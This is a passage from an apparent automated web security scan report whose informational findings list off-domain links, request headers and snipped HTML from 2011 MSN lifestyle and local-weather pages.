<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X1Fe3EMZPD2iv9gXlghF7p9YA4n9VlbgW?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<div id="seemore" class="cf" ><a href="http://www.bing.com/search?form=ALS&amp;q=">See more results</a>
...[SNIP]...
<map id="imap" name="imap"><area href="http://www.facebook.com/MSNLife" alt="MSN Lifestyle" shape="rect" coords="245,1,277,25" /><area href="http://twitter.com/MSN_Style" alt="MSN Twitter" shape="rect" coords="279,3,300,25" /></map>
...[SNIP]...
<span class="custom3"><a href="http://www.bing.com/search?q=Valentine%27s+Day+site%3Alifestyle.msn.com&amp;go=&amp;form=MSN037">Valentine's Day</a></span><a href="http://www.bing.com/search?q=winter+fashions+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Fashions</a><a href="http://www.bing.com/search?q=Miss+Manners+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=dress+your+body+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Dress Your Body</a><a href="http://www.bing.com/search?q=short+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=work+wardrobe+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=motherhood+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=ask+ying+site%3Alifestyle.redacted&amp;form=MSN037">Ask Ying</a><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=winter+boots+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Boots</a>
...[SNIP]...
</a><a href="http://www.bing.com/search?q=small+spaces+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Small Spaces</a><a href="http://www.bing.com/search?q=nail+colors+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=curly+hairstyles+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Curly Hairstyles</a><span class="custom2"><a href="http://www.bing.com/search?q=men%27s+style+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Men's Style</a></span><a href="http://www.bing.com/search?q=expert+makeup+tricks+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Expert Makeup Tricks</a><a href="http://www.bing.com/search?q=beauty+BFF+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=quick+cleaning+tips+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Quick Cleaning Tips</a><a href="http://www.bing.com/search?q=engagement+rings+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=baby+names+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Baby Names</a><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3"><a href="http://www.bing.com/search?q=kissing+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Kissing</a></span></a><a href="http://www.bing.com/search?q=winter+decor+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Decor</a><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2"><a href="http://www.bing.com/search?q=party+dresses+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom3">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=hot+jeans+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom4">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=home+organization+life+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037"><span class="custom2">
...[SNIP]...
</a><a href="http://www.bing.com/search?q=winter+coats+site%3Alifestyle.redacted&amp;go=&amp;form=MSN037">Winter Coats</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js"></script>
...[SNIP]...

22.116. http://lifestyle.redacted/your-look/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/video/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-look/video/?from=en-us_msnhp HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:23 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA16
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=da9fa5eca21f41b7bc9ef9d88bb965b3; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D969D46D91B9423384D0A7C5C6F7AC8A; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:23 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296353363&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fvideo%2F%3Ffrom%3Den-us_msnhp&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.117. http://lifestyle.redacted/your-look/video/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://lifestyle.redacted
Path:   /your-look/video/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /your-look/video/?from=en-us_msnhp HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:54:07 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA13
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=9bf5cf5d887849849fd9ba3bc1190610; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=A73D332601AB449F909ED0ED21F2E58A; domain=.redacted; expires=Thu, 18-Aug-2011 17:54:07 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 20461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="
...[SNIP]...
<div><img src="http://msnportallifestyle.112.2O7.net/b/ss/msnportallifestyle/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=ALS">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296410047&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flifestyle.redacted%2Fyour-look%2Fvideo%2F%3Ffrom%3Den-us_msnhp&amp;lc=1033&amp;id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=nasa+25th+challenger+anniversary&amp;form=MSNS24">challenger anniversary</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=girl+scouts+cut+back+several&amp;form=MSNS24">girl scout cookies</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=sheen+leaves+hospital&amp;form=MSNS24">charlie sheen</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=katy+perry+rolling+stone&amp;form=MSNS24">katy perry</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<li><a href="http://msn.delish.com/?ocid=lifestylehp ">Cooking</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/travel?cid=msn_lifestyle_nav ">Travel</a>
...[SNIP]...
</div><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li><a href="https://www.msnfeedback.com/perseus/surveys/961278308/75b585ac.htm">Take Our Survey</a>
...[SNIP]...

22.118. http://local.redacted/events.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /events.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /events.aspx?zip={0}&q={0} HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 23:47:54 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
STATUS_CODE: NotFound
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=eb91ff26e40940dabe69cc924b7a9d4f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=9C1F19500605454CA9159CD3F661FB58; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:54 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 6288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
   <head>
       <meta http-e
...[SNIP]...
<li>
                       <a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
</a>&nbsp;&bull;&nbsp;<a href="http://msnbc.com/">News</a>
...[SNIP]...
</a>&nbsp;&bull;&nbsp;<a href="http://msn.foxsports.com/">Sports by FOX
                       Sports</a>
...[SNIP]...
</a>&nbsp;&bull;&nbsp;<a href="http://www.whitepages.com/5050">White&nbsp;
                       Pages</a>
...[SNIP]...
</a>&nbsp;&bull;&nbsp;<a href="http://qspace.iplace.com/cobrands/444/home149.asp?sc=6151HPPP">Credit
                       Report</a>&nbsp;&bull;&nbsp;<a href="http://msn.match.com/msn/">Dating &amp;
                       Personals</a>
...[SNIP]...
</a>&nbsp;&bull;&nbsp;<a href="http://www.msn.americangreetings.com/index_msn.pd">Greeting&nbsp;Cards</a>
...[SNIP]...
</a>&nbsp;&bull;&nbsp;<a href="http://www.microsoft.com/">Microsoft.com</a>
...[SNIP]...
</a>&nbsp;&bull;&nbsp;<a href="http://windowsupdate.microsoft.com/">Windows
                       Update</a>
...[SNIP]...

22.119. http://local.redacted/hourly.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /hourly.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /hourly.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA32
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=bbe1b748577047db8825d18fac531bb8; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=4C732E0EF53C4DA5AF527942EA10BFD3; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344872&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fhourly.aspx%3Fq%3DDallas-TX%26zip%3D75201&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+29&amp;mkt=en-us&amp;FORM=MSNLEC">Saturday, Jan. 29, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1372&amp;FORM=MSNLEC">Hotels &amp; motels</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/default.aspx?q=shopping+near+75201&amp;order=distance&amp;FORM=MSNLEC">Shopping</a></li><li><a href="http://www.bing.com/local/default.aspx?q=sports+%26+recreation+near+75201&amp;order=distance&amp;FORM=MSNLEC">Sports &amp; recreation</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/Default.aspx?where=Dallas-TX&amp;FORM=MSNLEC"><span class="custom">
...[SNIP]...
<li class="first"><a href="http://www.bing.com/weather/tripplan?q=Dallas+Texas+Weather&amp;unit=F&amp;qpvt=weather+Dallas&amp;form=MSNLEC">Trip planner</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/jobseeker/jobs/jobResults.aspx?SiteID=cbmsnLO003&amp;lr=CBMSN&amp;sc_extcmp=JS_MSN_QSBox&amp;s_rawwords=&amp;s_freeloc=75201">Jobs</a></li><li><a href="http://www.bing.com/travel/deals/airline-ticket-deals.do?cid=msnlocal">Travel deals</a>
...[SNIP]...
<li><a href="http://realestate.msn.realtor.com/realestateandhomes-search/75201?gate=msn&amp;source=a2mszh1t042">Real estate listings</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White pages</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/local/ypdefault.aspx?cobrand=1&amp;where=75201">Yellow pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/weather/today?q=Dallas, Texas weather&amp;unit=F&amp;Form=MSNLAP">Find Maps and average temperatures</a>
...[SNIP]...
<li class="last"><a href="http://advertising.microsoft.com/msn">Advertise on MSN</a>
...[SNIP]...
<li class="last"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=mKXaToGw&amp;resize=false">Feedback</a>
...[SNIP]...

22.120. http://local.redacted/hourly.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://local.redacted
Path:   /hourly.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /hourly.aspx?q=Dallas-TX&zip=75201 HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:50:41 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA25
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=99565e28cf7548c38eab16d9a43ce414; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=8785AD8D573B4BC0989AC122C26DF4C7; domain=.redacted; expires=Thu, 18-Aug-2011 16:50:41 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<li><a href="http://video.msnbc.com">Video</a>
...[SNIP]...
<li class="coc3"><a href="http://msn.foxsports.com/">Sports</a><ul><li class="first"><a href="http://msn.foxsports.com/golf">Golf</a></li><li><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl">NFL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/tennis">Tennis</a></li><li class="last"><a href="http://msn.foxsports.com/video ">Video Highlights</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?wip=2&amp;v=2&amp;rtp=~&amp;FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a></li><li><a href="http://msn.match.com/msn/index.aspx">Personals</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=MSNLEC">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_navigation&amp;FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="first"><a class="to_inbox" href="http://mail.live.com/">Hotmail</a></li><li class="last"><a class="to_msgr" href="http://download.live.com/?sku=messenger">Messenger</a>
...[SNIP]...
<div><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406241&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Flocal.redacted%2Fhourly.aspx%3Fq%3DDallas-TX%26zip%3D75201&amp;lc=1033&amp;id=74430" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div class="link"><a href="http://www.bing.com/search?q=January+30&amp;mkt=en-us&amp;FORM=MSNLEC">Sunday, Jan. 30, 2011</a>
...[SNIP]...
<div class="link"><a href="http://www.myhomeredacted/" id="mkhm">Make MSN your home page</a>
...[SNIP]...
<div class="bingmap1" xmlns:cp="urn:schemas-microsoft-com/contentpublishing/content" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&amp;FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.789474,-96.80091065&amp;w=124&amp;h=124&amp;o=jpeg&amp;b=r,shading.hill,mkt.en-US&amp;z=8&amp;token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=306&amp;FORM=MSNLEC">Beauty salons</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=533&amp;FORM=MSNLEC">Child care services</a>
...[SNIP]...
<li><a href="http://www.bing.com/local/Default.aspx?where=Dallas+TX&amp;cat=1090&amp;FORM=MSNLEC">Florists</a></li><li><a href="http://www.bing.com/local/default.aspx?q=government+%26+community+near+75201&amp;order=distance&amp;FORM=MSNLEC">Government &amp; community</a>
...[SNIP]...
